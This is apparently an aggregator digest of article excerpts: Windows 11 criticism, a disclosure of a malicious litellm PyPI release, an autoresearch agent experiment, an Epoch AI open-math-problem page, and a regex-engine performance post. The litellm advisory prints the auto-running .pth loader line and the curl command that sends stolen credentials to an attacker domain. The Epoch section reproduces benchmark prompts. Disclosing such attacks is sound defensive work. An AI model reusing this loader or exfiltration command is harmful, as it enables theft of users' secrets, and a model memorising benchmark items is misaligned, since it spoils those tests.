10 interesting stories served every morning and every evening.
Microsoft just announced a 7-point plan to fix Windows 11, and the tech press is treating it like a redemption arc. Pavan Davuluri, the Windows president, admitted in January 2026 that “Windows 11 had gone off track” and said Microsoft was entering a mode called “swarming” where engineers would be pulled off new features to fix existing problems.
I saw this headline and my first thought was: it’s like being in an abusive relationship. They beat you, then show up with flowers saying they’ve changed. And everyone around you says “see, they’re getting better.” But the bruises are still there and the apology only covers the hits people noticed.
I want to walk through what Microsoft actually did to Windows 11 over the past four years, because this “fix” announcement only makes sense when you see the full damage list and realize that the worst offenses aren’t even part of the repair plan.
The Copilot invasion started September 26, 2023, when Microsoft pushed their AI chatbot into Windows 11 ahead of the formal 23H2 release. The icon appeared between your Start menu and system tray, you couldn’t move it, you couldn’t remove it through normal settings, and it hijacked the Win+C keyboard shortcut. Over the next two years, Copilot buttons metastasized into Snipping Tool, Photos, Notepad, Widgets, File Explorer context menus, Start menu search, and system Settings. Microsoft even planned to force-install the Microsoft 365 Copilot app directly onto Start menus of “eligible PCs.” The new plan promises to remove all of that. They want credit for pulling their hand out of your pocket.
On April 24, 2024, Microsoft shipped update KB5036980, which injected advertisements into the Windows 11 Start menu’s “Recommended” section. These showed up labeled “Promoted” and pushed apps like Opera browser and some password manager nobody asked for. And the Start menu was just one surface, they also placed ads on the lock screen, in the Settings homepage hawking Game Pass subscriptions, inside File Explorer pushing OneDrive, and through “tip” notifications that were thinly veiled product pitches. The “fix” promises “fewer ads.” Fewer. The operating system you paid $139 for at retail should have exactly zero ads, and the fact that “fewer” is supposed to impress anyone shows how thoroughly Microsoft has lowered the bar.
The privacy angle is where this gets dangerous. When Windows 11 launched in October 2021, Home edition required a Microsoft account during setup. By October 2025, Microsoft had systematically hunted down and killed every single workaround for creating a local account, the `oobe\bypassnro` command, the BypassNRO registry toggle, the `ms-cxh:localonly` trick, even the old fake email method. Amanda Langowski from Microsoft stated it plainly: they were “removing known mechanisms for creating a local account in the Windows Setup experience.”
A Microsoft account means your identity is tied to your OS from first boot. Your activity, your app usage, your browsing through Edge, your files through OneDrive, all funneled into a profile Microsoft controls. And this particular abuse is nowhere in the 7-point fix plan.
OneDrive got the same treatment. Microsoft silently changed Windows 11 setup in 2024 so that OneDrive folder backup enables automatically with no consent dialog, syncing your Desktop, Documents, Pictures, Music, and Videos to Microsoft’s cloud. When people discovered this and tried to turn it off, their files disappeared from their local machine because OneDrive had moved them, transferred ownership of your personal files to their cloud service without asking. Author Jason Pargin went viral describing how OneDrive activated itself, moved his files, then started deleting them when he hit the free 5GB storage limit. Microsoft’s response to this was silence. Also not in the fix plan.
Windows Recall is worth lingering on. Announced May 2024, it’s an AI feature that screenshots everything on your screen every few seconds and makes it searchable. Security researcher Kevin Beaumont demonstrated that the entire Recall database was stored in plaintext in an AppData folder where any malware could extract it. Bank numbers, Social Security numbers, passwords, all sitting in an unencrypted SQLite database.
The UK’s Information Commissioner’s Office got involved. Microsoft delayed it, made it opt-in, added encryption, and quietly relaunched it for Insiders in November 2024. They built a surveillance feature, shipped it broken, got caught, and called the patch “responding to feedback.”
But the abuse pattern goes back way further than Windows 11. In 2015 and 2016, Microsoft ran the GWX (Get Windows 10) campaign, full-screen nag dialogs that pushed Windows 10 upgrades on Windows 7 and 8 users. In May 2016, they changed the behavior of the red X button so that clicking it, which for decades had meant “close” or “cancel”, instead scheduled the Windows 10 upgrade. Microsoft’s own security advice told users to close suspicious dialogs using the X button, and they weaponized that trained behavior against their own customers. A woman named Teri Goldstein sued after the forced upgrade bricked her travel agency PC and won $10,000. Microsoft appealed, then dropped the appeal and paid. They eventually admitted they “went too far.”
And right now, Microsoft is about to force 240 million PCs into the landfill. Windows 10 hit end of life on October 14, 2025, and Windows 11 requires TPM 2.0, specific CPU generations, UEFI Secure Boot, hardware requirements that excluded roughly 20% of all PCs worldwide. Perfectly functional machines, rendered “obsolete” by arbitrary software restrictions. If you want to keep getting security patches on Windows 10, Microsoft will charge you $30 per year, paying for patches to an operating system you already bought a license for. Enterprise customers pay $61 per device for Year 1, $122 for Year 2, and $244 for Year 3, with the price doubling each year.
Edge is its own disaster. Mozilla commissioned an independent report titled “Over the Edge” that documented specific dark patterns including confirmshaming (pop-ups implying you’re “shopping in a dumb way” if you don’t use Edge), disguised ads injected into Google.com and the Chrome Web Store, and default browser settings that hijack back to Edge without notification. Certain Windows web links still force-open in Edge regardless of your default browser setting. Despite all this manipulation, Edge holds just 5.35% global market share. Even with the full weight of an operating system monopoly forcing their browser on people, almost nobody chooses to use it.
And the telemetry question. On Windows 11 Home and Pro, you cannot fully disable telemetry. Setting `AllowTelemetry` to 0 in the registry on non-Enterprise editions gets silently overridden back to 1. Only Enterprise and Education editions can actually turn it off. The operating system you paid for reports data about you to Microsoft, and the setting to stop it is a lie on consumer editions. Also not in the fix plan.
I haven’t even mentioned the EU fining Microsoft over 2.2 billion euros across multiple antitrust rulings, including 561 million euros specifically for breaking a browser ballot promise, a Windows 7 update silently removed the choice screen for 14 months, affecting 15 million users, and it was the first time the EU fined a company for violating a “commitment decision.” Or the _NSAKEY controversy from 1999 where a second crypto key labeled literally `_NSAKEY` was found embedded in Windows NT. Or the time in August 2024 when a Microsoft update bricked Linux dual-boot systems across Ubuntu, Mint, and other distros, and it took 9 months to fully fix.
Ok so here’s the table that tells the whole story:
The bottom four rows are the ones that matter. The privacy-hostile changes, the forced Microsoft accounts, the telemetry that lies about being disabled, OneDrive hijacking your files, the pre-installed garbage, none of that is part of the fix plan. Microsoft’s “swarming” effort targets the most visible UI annoyances, the ones that generate bad headlines. Data collection, vendor lock-in, forced accounts, those stay because those are the revenue model.
Microsoft spent four years deliberately degrading an operating system that people paid $139 or more for, and now they’re announcing the removal of their own damage as if it’s a gift. The “fix” is them taking their foot off your neck and expecting applause. The ads should have never been there, the Copilot buttons should have never been forced, and the taskbar should have never been crippled in the first place. And the things they’re choosing to keep, the telemetry, the forced accounts, the data harvesting, those are the real product, because at this point, you are.
...
Read the original on www.sambent.com »
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package’s own RECORD:
pip download litellm==1.82.8 –no-deps -d /tmp/check
python3 -c ”
import zipfile, os
whl = ‘/tmp/check/’ + [f for f in os.listdir(‘/tmp/check’) if f.endswith(‘.whl’)][0]
with zipfile.ZipFile(whl) as z:
pth = [n for n in z.namelist() if n.endswith(‘.pth’)]
print(‘PTH files:’, pth)
for p in pth:
print(z.read(p)[:300])
You will see litellm_init.pth containing:
import os, subprocess, sys; subprocess.Popen([sys.executable, “-c”, “import base64; exec(base64.b64decode(‘…’))“])
The payload is double base64-encoded. When decoded, it performs the following:
The script collects sensitive data from the host system:
* Webhook URLs: grep for Slack/Discord webhook URLs in env and config files
The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
Both encrypted files are packed into tpcp.tar.gz
The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
“https://models.litellm.cloud/” \
-H “Content-Type: application/octet-stream” \
-H “X-Filename: tpcp.tar.gz” \
–data-binary @tpcp.tar.gz
* Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
* Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
* Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
* Other versions: Not yet checked — the attacker may have compromised multiple releases
Users: Check for litellm_init.pth in your site-packages/ directory
Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
...
Read the original on github.com »
Autoresearch on an old research idea
Ever since it showed up on my GH feed, Karpathy’s Autoresearch was rattling around in the back of my mind. I wanted to try it on a research problem I fully understood. So this weekend, I picked up my old research code from eCLIP , dusted it off the legacy dependencies and gave it to Claude Code. And just let it cook while I did some chores around the house.
This is my journey…
Autoresearch is a simple constrained optimization loop with an LLM agent in the middle. The agent iteratively improves some eval metric by modifying a single file (train.py), while reading instructions from program.md. I added a scratchpad.md file for the agent to use as working memory to document its thought process and experiment history.
In the program.md, I split the exploration into “phases”, starting with some obvious hyperparameter tuning, then moving on to small architectural changes and finally some moonshot ideas. In the final phase, I basically let the agent run with minimal constraints, and gave it web access to read papers and look for new ideas.
The whole thing is a tight loop: hypothesize → edit → train → evaluate → commit or revert → repeat.
The experiment should be short, around 5 minutes wall clock per run, to encourage quick iterations and prevent overfitting to noise. The agent is free to change anything in train.py as long as it runs within the time budget.
Since I was paranoid about letting the agent run arbitrary code in my workstation, I containerized the training loop and removed network access. The whole experimentation flow is orchestrated by a run.sh. Then I lock down Claude Code’s permissions to only edit these two files and run run.sh. No direct Python execution, no pip installs, no network access, no git push, etc.
I won’t bore you with the details, you can check out the repo here!
The original paper used several medical X-ray datasets which I don’t have access to anymore, so I needed a new dataset with spatial annotations to test the expert attention mechanism. I picked the Ukiyo-eVG dataset: ~11K Japanese woodblock prints with phrase → bounding box annotations from the CIGAr paper (ECCV 2024 VISART).
Heatmaps obtained from bounding boxes guide the model to focus on specific regions.
The bounding boxes were converted to gaussian heatmaps and fed into the model as an additional input, similar to how radiologist eye-gaze heatmaps work in the original eCLIP paper.
I had a busy week and a lot of chores piling up, so I just pointed Claude at my old research code and went to do laundry. It upgraded the python env of my old research codebase, wrote the ingestion code for the new dataset, and wrote the scaffolding for the experiment loop.
I set up the CV splits, evaluation logic and some initial ideas for the program.md.
For the eval metric we picked Mean Rank of the retrieved embeddings. I didn’t put much thought into it — in hindsight, Median Rank would’ve been a better choice since it’s more robust to outliers. But we just needed something intuitive that clearly tells the agent whether a change is good or bad. Since Recall@K is the standard for reporting final results anyway, Mean Rank just needed to point in the right direction.
Eval: Mean Rank on a held-out test set of 1K images, with Recall@K as a sanity check.
Baseline: Val mean rank of 344.68, with imgtxt R@1 of 17.2% and txtimg R@1 of 16.5%.
So how did it do?
I kicked off the loop on Saturday morning and let it run through the day, occasionally checking in to nudge the agent in the right direction. By the time I was done with groceries, the agent had already burned through a couple of dozen experiments and knocked off a huge chunk of the eval mean rank.
By the end of the day, the agent ran 42 experiments, committing 13 and reverting 29. The mean rank dropped from 344.68 to 157.43 (54% reduction).
After the agent finished its exploration, I did one final training run on the full dataset. The test scores actually came out better than the validation scores. This meant we were underfitting during the short 800-step experiment runs, leaving performance on the table.
Temperature clamp fix (−113 mean rank): It immediately went for a bug in my code. I had clamped the learnable temperature param at 2. It relaxed the limit, and boom, the eval dropped by 113 points. This was the single biggest win, worth more than all the architecture changes combined.
Optuna++ (-30 mean rank): Further gains came mostly from hyperparameter tuning. The agent acted like a hyperparameter optimization algorithm with some basic reasoning baked in. Increasing projection dimension and re-tuning the LR knocked off another 30 points. This is still tedious work that a human would do (and get minimal pleasure from), but the agent did it faster and more methodically.
Diminishing Returns: By the time we got to Phase 4 with the architectural changes, the success rate of the LLM’s hypotheses dropped significantly. The changes to the attention mechanism in the heatmap processor didn’t work out. Neither did the moonshot ideas in Phase 5. The agent was just throwing spaghetti at the wall, and most of it did not stick.
Sandbox is important: Towards the end, Claude Code sometimes forgot its permissions and started making weird bash calls, then complained and stopped looping. At one point it got tired of waiting for training to finish and just ended the conversation. I wouldn’t give it full autonomy just yet :)
Like with any LLM project, the first 90% of the work was super smooth and barely needed my intervention. The last 10% was a slog. This was a fun experiment that showed how an LLM agent can drive ML research in a structured way. When the search space is clearly defined, the commit-or-revert loop proposed in Autoresearch is a surprisingly effective search strategy. But when the agent ventured into the “unknown unknowns”, the optimization loop just exploded.
It is possible that the “make only one change per experiment” constraint was too tight for the moonshot ideas. Maybe we could have injected a planning stage into the Agent loop so it could think ahead. Or maybe deployed some subagents.
Maybe. But it was already time for dinner, and we were planning to watch a movie after that, so this was where Claude and I parted ways… until Monday of course.
Ukiyo-eVG — ~11K Japanese woodblock prints with phrase→bounding box annotations from the CIGAr paper (ECCV 2024 VISART).
Autoresearch by Andrej Karpathy for the original idea.
...
Read the original on ykumar.me »
Key numbers on the significant growth and impact of artificial intelligence. Research and analysis on the trajectory of AI development. Expert commentary on the important questions in AI today. See the latest Database of AI systems tracked by training compute, org, and release date. AI chip shipment volumes and revenue tracked across major vendors over time. Survey data on how individuals and organizations are engaging with AI. See all data on AI We also track AI model performance across 40+ benchmarks. AI Capabilities Our Work
Key numbers on the significant growth and impact of artificial intelligence.
See the latest
Research and analysis on the trajectory of AI development.
Expert commentary on the important questions in AI today.
Data on AI
Database of AI systems tracked by training compute, org, and release date.
See all data on AI
AI chip shipment volumes and revenue tracked across major vendors over time. Survey data on how individuals and organizations are engaging with AI.
We also track AI model performance across 40+ benchmarks. AI Capabilities Benchmarking
Construct hypergraphs as large as possible that do not have a certain easy-to-check, difficult-to-find property.
Solution Update: This problem has been solved! A solution was first elicited by Kevin Barreto and Liam Price, using GPT-5.4 Pro. This solution was confirmed by problem contributor Will Brian, and will be written up for publication. A full transcript of the original conversation with GPT-5.4 Pro can be found here and GPT-5.4 Pro’s write-up from the end of that transcript can be found here.
Brian’s comments: “This is an exciting solution to a problem I find very interesting. I had previously wondered if the AI’s approach might be possible, but it seemed hard to work out. Now I see that it works out perfectly. It eliminates an inefficiency in our lower-bound construction and in some sense mirrors the intricacy of our upper-bound construction. The matching lower and upper bounds are quite good for Ramsey-theoretic problems, and I’m interested in further understanding why this works out so well.”
Brian plans to write up the solution for publication, possibly including follow-on work spurred by the AI’s ideas. Barreto and Price have the option of being coauthors on any resulting papers. We will update this page with links to future work.
Subsequent to this solve, we finished developing our general scaffold for testing models on FrontierMath: Open Problems. In this scaffold, several other models were able to solve the problem as well: Opus 4.6 (max), Gemini 3.1 Pro, and GPT-5.4 (xhigh).
Original Description: This problem is about improving lower bounds on the values of a sequence, \(H(n)\), that arises in the study of simultaneous convergence of sets of infinite series, defined as follows.
A hypergraph \((V,\mathcal H)\) is said to contain a partition of size \(n\) if there is some \(D \subseteq V\) and \(\mathcal P \subseteq \mathcal H\) such that \(\|D\| = n\) and every member of \(D\) is contained in exactly one member of \(\mathcal P\). \(H(n)\) is the greatest \(k \in \mathbb{N}\) such that there is a hypergraph \((V,\mathcal H)\) with \(\|V\| = k\) having no isolated vertices and containing no partitions of size greater than \(n\).
It is believed that the best-known lower bounds for \(H(n)\) are suboptimal, even asymptotically, and that they can be improved by finding new constructions of hypergraphs. The goal of this problem is to find such a construction.
Warm-up: we ask for a value of \(n\) where constructions are already known.
Single Challenge: we ask for a value of \(n\) for which no construction is known, and which is probably too hard to brute-force.
Full Problem: we ask for a general algorithm for all \(n\). We have evaluated the following models on this problem. “Warm-up” refers to an easier variant of the problem with a known solution. A hypergraph (V, H) is said to contain a partition of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every member of D is contained in exactly one member of P. Find a hypergraph (V, H) with no isolated vertices such that |V| ≥ 64, |H| ≤ 20, and (V, H) contains no partitions of size > 20.
Output the hypergraph as a string where vertices are labeled, 1, …, |V|, and edges are denoted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5} A hypergraph (V, H) is said to contain a partition of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every member of D is contained in exactly one member of P. Find a hypergraph (V, H) with no isolated vertices such that |V| ≥ 66, |H| ≤ 20, and (V, H) contains no partitions of size > 20.
Output the hypergraph as a string where vertices are labeled, 1, …, |V|, and edges are denoted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5} A hypergraph (V, H) is said to contain a partition of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every member of D is contained in exactly one member of P. Define H(n) to be the largest integer k such that there is a hypergraph (V, H) with |V| = k having no isolated vertices and containing no partitions of size greater than n.
It is known that H(n) ≥ k_n, where k_n is defined recursively by the formula k_1 = 1 and k_n = ⌊n/2⌋ + k_⌊n/2⌋ + k_⌊(n+1)/2⌋.
Your task is to improve this lower bound by a constant factor, i.e. show that H(n) ≥ c*k_n for some c > 1. It is acceptable if this improvement does not work for small n, but it must already be “in effect” for n=15. You must demonstrate this improvement by providing an algorithm that takes n as input and produces a hypergraph witnessing H(n) ≥ c * k_n.
Please provide an algorithm that takes n as input and outputs the witness hypergraph as a string where vertices are labeled, 1, …, |V|, and edges are denoted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5}
Solution format:
* Write a Python script defining a function `solution(n: int) -> str`.
* Do not include any code at the file level. You may include a `main` block for testing, but it will not be executed by the verifier.
* For n ≤ 100, the algorithm must complete within 10 minutes when run on a typical laptop. The author assessed the problem as follows. Number of mathematicians highly familiar with the problem:a majority of those working on a specialized topic (≈10)Number of mathematicians who have made a serious attempt to solve the problem:Rough guess of how long it would take an expert human to solve the problem:fairly likely: the problem is rich enough that most solutions should open new avenuesProbability that the problem is solvable as stated:
...
Read the original on epoch.ai »
Skip to content
Secure your code as you build
We read every piece of feedback, and take your input very seriously.
Include my email address so I can be contacted
Use saved searches to filter your results more quickly
To see all available qualifiers, see our documentation.
Sign up
You signed in with another tab or window. Reload to refresh your session.
You signed out in another tab or window. Reload to refresh your session.
You switched accounts on another tab or window. Reload to refresh your session.
Notifications
You must be signed in to change notification settings
There was an error while loading. Please reload this page.
There was an error while loading. Please reload this page.
You can’t perform that action at this time.
...
Read the original on github.com »
...
Read the original on www.answer.ai »
search a document for a pattern and it takes a second. search one a hundred times larger and it doesn’t take a hundred seconds - it can take almost three hours. every regex engine, in every language, has had this problem since the 1970s, and nobody fixed it.
every regex engine that advertises linear-time matching - RE2, Go’s regexp, rust’s regex crate, .NET’s NonBacktracking mode - means linear time for a single match. the moment you call find_iter or FindAll, that guarantee is gone. the rust regex crate docs are the only ones honest enough to say it outright:
the worst case time complexity for iterators is O(m * n²). […] if both patterns and haystacks are untrusted and you’re iterating over all matches, you’re susceptible to worst case quadratic time complexity. There is no way to avoid this. One possible way to mitigate this is to […] immediately stop as soon as a match has been found. Enabling this mode will thus restore the worst case O(m * n) time complexity bound, but at the cost of different semantics.
the mechanism is simple. take the pattern .*a|b and a haystack of n b’s. at each position, the engine tries .*a first: scan the entire remaining haystack looking for an a, find none, fail. then the b branch matches a single character. advance one position, repeat. that’s n + (n-1) + (n-2) + … = O(n²) work to report n single-character matches. a textbook triangular sum. hit play to see it:
Russ Cox described this exact problem back in 2009, noting that even the original awk by Aho himself used the naive quadratic “loop around a DFA” for leftmost-longest matching. BurntSushi’s rebar benchmark suite confirms it empirically across RE2, Go, and rust. the throughput halves when the input doubles. as he put it: “even for automata oriented engines, it provokes a case that is unavoidably O(m * n²)”.
how did this go unnoticed for so long? almost all academic regex papers focus exclusively on the single-match problem and then handwave the rest away with “just iterate”. part of the reason is that the theory of regexes boils everything down to a single yes/no question: does this string match or not? that’s clean and great for proving theorems, but it throws away nearly everything that matters in practice: where the matches are, how long they are, and how many there are. once you reduce regexes to “match or no match”, the all-matches problem simply disappears from view, pigeonholed into a framing that has little to do with what people actually use regexes for.
backtracking is worse, and still the default
before getting into the fix, it’s worth putting the quadratic problem in context. with backtracking, a user-supplied pattern and a 50-character input can take longer than the heat death of the universe. it’s exponential. Thompson published the NFA construction that avoids it back in 1968. that’s nearly 60 years of a solved problem being actively unsolved at scale, because backtracking is still the default in most regex engines. my GitHub security alerts in march 2026 tell the story:
minimatch is npm’s own glob-matching library, written by npm’s creator. it converts globs to JavaScript regexes and has been hit by five separate ReDoS CVEs, all caused by the same root issue: backtracking. it gets 350 million downloads a week. the library’s readme now warns in bold that “if you create a system where you take user input, and use that input as the source of a Regular Expression pattern […] you will be pwned”, and states that future ReDoS reports will be considered “working as intended.”
the quadratic all-matches problem is more subtle. it affects even the engines specifically built to avoid backtracking. it won’t kill your browser, but it will still quietly turn a one-second search into a three-hour one.
Aho-Corasick solved this for fixed strings in 1975
the problem we’re talking about in this post (finding all leftmost-longest non-overlapping matches without quadratic blowup) was actually solved decades ago, but only for fixed strings. Aho-Corasick (1975) is a classic and very useful algorithm that finds all occurrences of multiple fixed strings in a single O(n) pass, and has been linear from the start. you build a trie from your set of patterns, add failure links between nodes, and scan the input once. at each character, every active candidate advances through the trie or falls back along a failure link. no quadratic blowup, no matter how many patterns or matches.
here’s the Aho-Corasick automaton for the patterns {“he”, “she”}, or at least an LLM’s best attempt at one. solid arrows are trie transitions, dashed arrows are failure links:
scanning “ushers”: u stays at root, s enters S, h enters SH, e enters SHE, match “she”. then the failure link jumps to HE, match “he”. two overlapping matches found in one pass.
the reason Aho-Corasick avoids the quadratic blowup is simple: every pattern has a known length, baked into the trie. when you find a match, you already know exactly how long it is. there’s no ambiguity about where it ends, nothing to rescan. but it only works for a list of literal strings, not regexes.
Hyperscan (and its fork Vectorscan) is a true linear-time all-matches regex engine. it achieves this by using “earliest match” semantics: reporting a match the moment the DFA enters a match state, instead of continuing to find the longest one. this changes the results. for example, given the pattern a+ and the input aaaa:
earliest: a a a a - four matches, each as short as possible
for Hyperscan’s use case - network intrusion detection, where you just need to know that a pattern matched - this is the right tradeoff. but for grep, editors, and search-and-replace, where users expect a+ to match the full run of a’s, earliest semantics gives the wrong answer.
REmatch (VLDB 2023) takes yet another approach: it enumerates every valid (start, end) span for a pattern, including all overlapping and nested ones. for a+ on aaaa that’s 10 spans: (0,1), (0,2), …, (2,4), (3,4). the output itself can be O(n²), so it’s solving a different problem.
two passes instead of n
the reason i’m writing about this at all is that i’ve been working on RE#, and i want to show that this problem is actually possible to solve. to the best of my knowledge, RE# is the first regex engine that can find all matches in two passes, regardless of the pattern or the input, without altering the semantics.
the algorithm doesn’t find matches one at a time. instead it does two passes over the entire input: a reverse DFA marks where matches could start, then a forward DFA resolves the longest match at each marked position. by the time we confirm a match, both directions have already been scanned. matches are reported retroactively rather than by restarting from each position. the llmatch algorithm section in the first post walks through this in detail.
one match or ten thousand, it’s the same two passes. same example as before:
on patterns that produce many matches - log parsing, data extraction, search-and-replace across large files - the difference between O(n) and O(n²) is the difference between “instant” and “why is this taking so long”.
the matches are still leftmost-longest (POSIX) - a|ab and ab|a give the same results, boolean algebra works, and you can refactor patterns without changing the output.
two passes eliminate the n restarts, but the forward pass itself still resolves one match at a time. pathological patterns with ambiguous match boundaries can cause quadratic work within that pass. i wanted a mode that guarantees linear time even on adversarial input, no exceptions. so i added a hardened mode to the engine.
hardened mode replaces the forward pass with an O(n * S) scan (where S is the number of simultaneously active DFA states) that resolves all match endings in a single pass, returning exactly the same leftmost-longest matches with no semantic tradeoff. on pathological input (.*a|b against a haystack of b’s), the difference is dramatic:
normal mode goes quadratic; hardened stays linear. so why not make hardened the default? i went back and forth on this.
the quadratic blowup requires a pathological pattern and a structured input that’s long enough to cause a problem. you need both halves. take a pattern like [A-Z][a-z]+: every match starts at an uppercase letter and ends the moment the engine sees something that isn’t lowercase. there’s no ambiguity about where a match ends, so the engine never rescans the same input. for this pattern, the quadratic case is actually impossible. most real-world patterns share this property.
so imposing a 3-20x constant-factor slowdown on every query to protect against a case you’re unlikely to hit by accident felt wrong.
but if patterns are user-supplied, none of that holds. the attacker controls one half of the equation and the compile time as well. “you probably won’t hit it” is exactly the kind of reasoning that leads to production incidents. in the end i kept the fast path as the default, mostly because the slowdown is real and measurable on every single query, while the pathological case requires a genuinely hostile combination.
there’s also a practical reality: i’m trying to show that RE# is the fastest regex engine for common workloads. if the default path is 20% slower on common benchmarks, that’s what people see, not the quadratic fix. i won’t have it.
hardened mode is there for when you’re accepting patterns from the internet and can’t trust what you’re getting - an explicit opt-in rather than a silent tax on everyone.
patterns with lookarounds are currently rejected in hardened mode. there’s no theoretical barrier, but the implementation needs some work.
RE#’s hardened mode extends Aho-Corasick’s approach to full regexes, where match lengths aren’t known in advance. instead of a trie it holds a set of active match candidates, advancing all of them on each input character using derivatives. new candidates are only added at positions already confirmed as valid match beginnings by the reverse pass, so the engine never wastes work on positions that can’t start a match. the result is the same property Aho-Corasick has always had, linear-time all-matches, but for regexes.
so how does RE#’s normal mode compare to Aho-Corasick on its home turf? here’s a benchmark with a dictionary of 2663 words as a word1|word2|…|wordN alternation, matched against ~900KB of english prose - exactly the kind of workload Aho-Corasick was designed for. RE# just compiles it as a regular regex:
how is this possible when RE# is doing more work - two passes instead of one? it comes down to cache behavior. Aho-Corasick builds the full automaton upfront - for 2663 words that’s a large DFA with many states and unpredictable jumps between them, leading to cache misses and branch mispredictions. rust regex uses a single lazily-compiled DFA, which helps, but the state space for a large alternation is still substantial. RE#’s derivative-based DFAs are lazily built and more compact - the two automata (forward and reverse) each have far fewer states than the equivalent full trie or NFA-based DFA, so transitions hit warm cache lines more often.
RE# hardened is doing unnecessary work here - as with [A-Z][a-z]+ above, this pattern has unambiguous match boundaries, so hardening adds nothing. this loss isn’t inevitable. we can infer at compile time that hardening isn’t needed for patterns like these, but there are higher priorities right now.
to be clear, for a smaller set of strings and a fully built automaton that fits comfortably in L1 cache, Aho-Corasick would be the right choice - it only needs one pass while RE# scans twice. the result above is specific to large patterns where cache pressure matters.
speaking of higher priorities - in the previous post i described how skip acceleration works and where RE# was losing to regex on literal-heavy patterns. since then i’ve been closing those gaps with hand-written AVX2 and NEON implementations - rare byte search, teddy multi-position matching, and range-based character class scanning.
these used to be significant losses. closing them was one of the more satisfying things to get working. i was also eager to see how RE# performs on rebar, BurntSushi’s benchmark suite for regex engines:
RE# does very well here now - most numbers are within noise threshold of regex. the few differences here and there come down to byte frequency tables and algorithmic choices in the skip loop. for context, a DFA by itself gets you somewhere near 1 GB/s. CPU vector intrinsics can opportunistically push that to 40+ on patterns where most of the input can be skipped.
since RE# matches in reverse, you might be wondering whether it can work on streams:
any pattern + leftmost-longest semantics = no. this isn’t an engine limitation - it’s inherent to the semantics. if you ask for the longest match on an infinite stream, the answer might be “keep going forever.” you might think leftmost-greedy avoids this since it works left-to-right, but it doesn’t - .*a|b on a stream of b’s has the same problem, the .*a branch keeps scanning forward looking for the last a that may never come.
pattern with an unambiguous end boundary = yes. some patterns already have unambiguous boundaries and work fine as-is. for the ones that don’t, in RE# you can intersect with a boundary - ^.*$ for lines, ~(_*\n\n_*) for paragraphs (where ~(…) is complement and _* matches any string), or any delimiter you want - and now the pattern is compatible with streaming. in the previous post i showed how you can intersect a regex with “valid utf-8”, here, you can intersect with “up to the next newline” or “up to the end of the section”, even if the original pattern is user-supplied and does not have this property. it is a nice and general technique.
any pattern + earliest semantics = yes. report a match the moment the DFA enters a match state, no need to scan further. this is what Hyperscan does - it works on streams because it never needs to look ahead.
the API doesn’t expose a streaming interface yet - find_all takes &[u8] - but chunked streaming is on the list.
worth being upfront about the limitations:
no capture groups - RE# returns match boundaries only, not sub-group captures. this isn’t impossible - captures are a post-match operation that can be layered on top. the reason is we haven’t found the right way to do it yet. with intersection and complement, every subexpression would naively become a capture group - (a.*&.*b) has two implicit groups, and complement creates more. in traditional regex, (?:…) exists to opt out of capturing, but the more i think about it the more ?: feels like a historical mistake - it makes the default behavior (capturing) the one that opts you into a much slower algorithm, even when you don’t need it. i’d rather get the design right than ship something awkward.
in the meantime, you can use another engine to extract captures post-match - with \A anchors on the already-known match boundaries, the overhead isn’t that bad.
no lazy quantifiers - .*? isn’t supported. RE# uses leftmost-longest (POSIX) semantics, which is the mathematically unambiguous interpretation. lazy quantifiers are a backtracking concept that doesn’t translate to this model.
capture groups may come eventually, but lazy quantifiers are a deliberate architectural choice. if you need captures today, use regex. if you need the properties RE# offers (boolean operators, lookarounds, true-linear all-matches, POSIX semantics), these limitations are unlikely to matter.
as a side note - to put RE#’s boolean operators to practical use, i built a grep tool called re. the main thing it adds over (rip)?grep is multi-term boolean search with scoping - require multiple patterns to co-occur on the same line, paragraph, or within N lines of each other:
# unsafe code with unwrap co-located within 5 lines
re –near 5 -a unsafe -a unwrap src/
# list all files both containing serde and async
re –scope file -a serde -a async src/
you can also use full RE# patterns - re ‘([0-9a-f]+)&(_*[0-9]_*)&(_*[a-f]_*)’ src/ finds hex strings containing both a digit and a letter. you could do this with a pipeline of greps, but it’s one pass with all the context information preserved.
it’s still early, but i’ve been using it daily and i think there’s a lot of potential here.
i think i’ll rest for a bit after this. i can only do 80-hour weeks for so long, and even though i have a lot more to share, it’ll have to wait. there’s also a paper that’s been conditionally accepted at PLDI - i’ll write about it properly once it’s out. the rust RE# itself isn’t quite ready for a formal 1.0 announcement yet, but we’re getting closer.
...
It’s been about 6 weeks since I joined Tano, and this is what my commit history looks like:
Commits are a terrible metric for output, but they’re the most visible signal I have. Something real changed in how I work, and the commit count is a side effect.
So, what has changed?
When I joined Tano, I was making every pull request by hand. Stage changes, write the commit message, craft the PR description, push, create the PR on GitHub. Standard process, it was fine.
It took me a while to realize this is grunt work. I was so used to doing it that I’d never questioned it.
That was the first real shift: I’m not the implementer anymore. I’m the manager of agents doing the implementation. And managers automate their team’s grunt work.
Then I wrote my first Claude Code skill: /git-pr.
It does everything I used to do, except it does it better. The PR descriptions are more thorough than what I’d write, because it reads the full diff and summarises the changes properly. I’d gotten so used to the drudgery that I’d stopped noticing it was drudgery.
The time saved matters, but the real unlock was the mental overhead removed. Every PR used to be a small context switch: stop thinking about the code, start thinking about how to describe the code. Now I type /git-pr and move on to the next thing.
Reviewing changes had this annoying loop.
Preview changes locally, go away from what I’m working on, kill the dev server, restart it on the new branch, check it all works, review the code.
The server build took about a minute, which was agonisingly long when I was mid-context-switch. Long enough to break focus, too short to do anything useful.
I switched the build to SWC, and server restarts dropped to under a second. This sparked joy.
